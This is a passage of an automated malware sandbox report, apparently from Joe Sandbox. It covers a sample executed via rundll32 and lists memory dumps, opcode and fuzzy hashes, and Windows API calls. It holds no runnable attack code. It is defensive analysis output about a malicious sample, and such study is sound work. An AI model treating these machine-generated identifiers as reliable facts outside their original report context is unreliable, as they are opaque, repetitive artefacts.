                    • Associated: 00000005.00000002.2533228177.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533243375.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533261153.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533279171.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533295179.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533312488.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533327781.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533344055.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533361206.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533378194.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533378194.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533410090.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533428031.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533444564.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533461032.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533479426.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533497371.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533552895.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533552895.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: DefaultLanguageSystem
                    • String ID:
                    • API String ID: 4166810957-0
                    • Opcode ID: 4b3f0bc70c23130fb30134ecec6d65e895bedad671c913361aa0c8b291725634
                    • Instruction ID: bb2f8fdc298b904da0d8311a6692b3c5818f4a7b9ef0247cd5b56ed5edd11b73
                    • Opcode Fuzzy Hash: 4b3f0bc70c23130fb30134ecec6d65e895bedad671c913361aa0c8b291725634
                    • Instruction Fuzzy Hash: A651B576210B8089DB20EF76D8953D92762FB8479CF905427EA0D8BB59DF78C9C5C384
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000001.2181891398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00401000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_1_401000_rundll32.jbxd
                    Similarity
                    • API ID: _purecall
                    • String ID:
                    • API String ID: 2735755456-0
                    • Opcode ID: 34e08782d0b2abeab290b5938683ac0c5089fb78d699873dfdb03679ecaeec6f
                    • Instruction ID: 4300a03b654388cda1521b2fd91d453c6dd8b978794cc5804b7cd06f28fe1084
                    • Opcode Fuzzy Hash: 34e08782d0b2abeab290b5938683ac0c5089fb78d699873dfdb03679ecaeec6f
                    • Instruction Fuzzy Hash: E5316370514A8D8FEBB4EF58DC88BD97BE4FB28305F50426AA80DD7250DB749998CB84
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000001.2181891398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00401000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_1_401000_rundll32.jbxd
                    Similarity
                    • API ID: LocaleThread
                    • String ID:
                    • API String ID: 635194068-0
                    • Opcode ID: 80f16aebb1bf50093468e4afb0ad3d2cbcfedbe2a87a43ed36ffb567c83fa0a4
                    • Instruction ID: 9c3d9517ba1e7483fc5c2e10884714a851570df5bb2af150f02a4d48e2cbe2f7
                    • Opcode Fuzzy Hash: 80f16aebb1bf50093468e4afb0ad3d2cbcfedbe2a87a43ed36ffb567c83fa0a4
                    • Instruction Fuzzy Hash: 5F111C748086188EEB40FFBAF85A6963AE0EB14318B01053FE145D72B2FEB84155879F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    • GetModuleFileNameW.KERNEL32 ref: 004155BB
                    Memory Dump Source
                    • Source File: 00000005.00000002.2532604364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000005.00000002.2532586504.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532604364.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532899915.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532917461.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532933329.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532948683.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532964037.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532979304.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532998558.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533013227.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533029029.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533043653.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533058174.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533072958.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533088602.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533104301.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533120564.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533135554.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533151750.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533165974.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533181574.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533196982.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533213605.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533228177.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533243375.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533261153.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533279171.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533295179.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533312488.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533327781.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533344055.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533361206.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533378194.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533378194.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533410090.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533428031.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533444564.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533461032.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533479426.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533497371.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533552895.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533552895.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: FileModuleName
                    • String ID:
                    • API String ID: 514040917-0
                    • Opcode ID: d11a0e43b40b78acf69311fe5df8e6df2ec459576eda087bd5762c40fa154f83
                    • Instruction ID: 501e22f373f49a8995146b0ee06b89f1180c0e2900e8ccb6f530d303bba059fa
                    • Opcode Fuzzy Hash: d11a0e43b40b78acf69311fe5df8e6df2ec459576eda087bd5762c40fa154f83
                    • Instruction Fuzzy Hash: 8B111532220A5098DB20EFB6C8957DA2765E7487CCF51202AFA4E47B99DF79C189C394
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 377 436300-436314 378 436316-436321 377->378 379 43636e-436374 377->379 378->379 380 436323-436369 call 411140 CreateFileW 378->380 380->379
                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2532604364.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000005.00000002.2532586504.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532604364.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532899915.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532917461.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532933329.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532948683.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532964037.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532979304.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532998558.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533013227.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533029029.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533043653.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533058174.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533072958.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533088602.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533104301.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533120564.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533135554.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533151750.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533165974.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533181574.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533196982.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533213605.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533228177.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533243375.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533261153.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533279171.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533295179.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533312488.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533327781.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533344055.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533361206.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533378194.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533378194.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533410090.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533428031.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533444564.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533461032.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533479426.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533497371.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533552895.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533552895.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 284c0e5acaf1a39cf53334d5868b45d7cac6dafcafc8e2c2b16519ba11dc2266
                    • Instruction ID: d3c8a1eeb71ef1c90a0784c7f1fd121a30001ba4d6e3ee18811ea5d7b0f81f86
                    • Opcode Fuzzy Hash: 284c0e5acaf1a39cf53334d5868b45d7cac6dafcafc8e2c2b16519ba11dc2266
                    • Instruction Fuzzy Hash: 99F0F072A1565186F7309B10E8C138E7210F388778F4A8329DEA8073D0CB7C88098784
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2532604364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000005.00000002.2532586504.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532604364.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532899915.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532917461.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532933329.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532948683.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532964037.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532979304.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532998558.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533013227.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533029029.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533043653.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533058174.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533072958.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533088602.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533104301.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533120564.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533135554.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533151750.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533165974.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533181574.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533196982.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533213605.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533228177.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533243375.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533261153.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533279171.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533295179.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533312488.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533327781.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533344055.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533361206.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533378194.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533378194.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533410090.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533428031.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533444564.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533461032.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533479426.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533497371.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533552895.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533552895.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: Locale$Info$Valid
                    • String ID:
                    • API String ID: 1826331170-0
                    • Opcode ID: 758832ac8bfc747b38319bcf7e9e6b8ebdb2f8f58ab823f02b5fd08fc2440837
                    • Instruction ID: 82bd8e35acb4018011bb46240219f5a68b361100da04a9b519d270e8b6329376
                    • Opcode Fuzzy Hash: 758832ac8bfc747b38319bcf7e9e6b8ebdb2f8f58ab823f02b5fd08fc2440837
                    • Instruction Fuzzy Hash: C841A972300A848ADB14DFA2D8507ED2726F784798F90802BEE5D47F98DB3CC599C399
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000005.00000002.2532604364.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000005.00000002.2532586504.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532604364.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532899915.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532917461.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532933329.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532948683.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532964037.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532979304.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532998558.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533013227.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533029029.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533043653.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533058174.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533072958.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533088602.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533104301.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533120564.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533135554.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533151750.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533165974.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533181574.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533196982.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533213605.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533228177.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533243375.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533261153.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533279171.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533295179.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533312488.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533327781.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533344055.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533361206.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533378194.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533378194.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533410090.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533428031.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533444564.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533461032.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533479426.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533497371.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533552895.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533552895.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_400000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4a598e5603234048a23161fdfb36fba7c113134fbf38ddcad901b3747140f00b
                    • Instruction ID: e68a09c6c25a65edcf2826e8d8e7b3c8c80d17a3536d123f320973ba5c3fc64f
                    • Opcode Fuzzy Hash: 4a598e5603234048a23161fdfb36fba7c113134fbf38ddcad901b3747140f00b
                    • Instruction Fuzzy Hash: A5822672204B848ECB30DF36C8503EA73A1F74979CF10611AEA4A4BB98DF79D945C749
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 0040DFA0: GetCurrentThreadId.KERNEL32 ref: 0040DFA8
                    • GetTickCount.KERNEL32 ref: 0040D9A6
                    • GetTickCount.KERNEL32 ref: 0040D9BF
                    • GetCurrentThreadId.KERNEL32 ref: 0040D9F9
                    • GetTickCount.KERNEL32 ref: 0040DA2C
                    • GetTickCount.KERNEL32 ref: 0040DA65
                    • GetTickCount.KERNEL32 ref: 0040DA93
                    • GetCurrentThreadId.KERNEL32 ref: 0040DB03
                    Memory Dump Source
                    • Source File: 00000005.00000002.2532604364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000005.00000002.2532586504.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532604364.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532899915.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532917461.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532933329.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532948683.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532964037.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532979304.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532998558.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533013227.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533029029.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533043653.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533058174.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533072958.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533088602.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533104301.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533120564.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533135554.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533151750.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533165974.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533181574.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533196982.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533213605.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533228177.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533243375.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533261153.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533279171.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533295179.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533312488.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533327781.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533344055.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
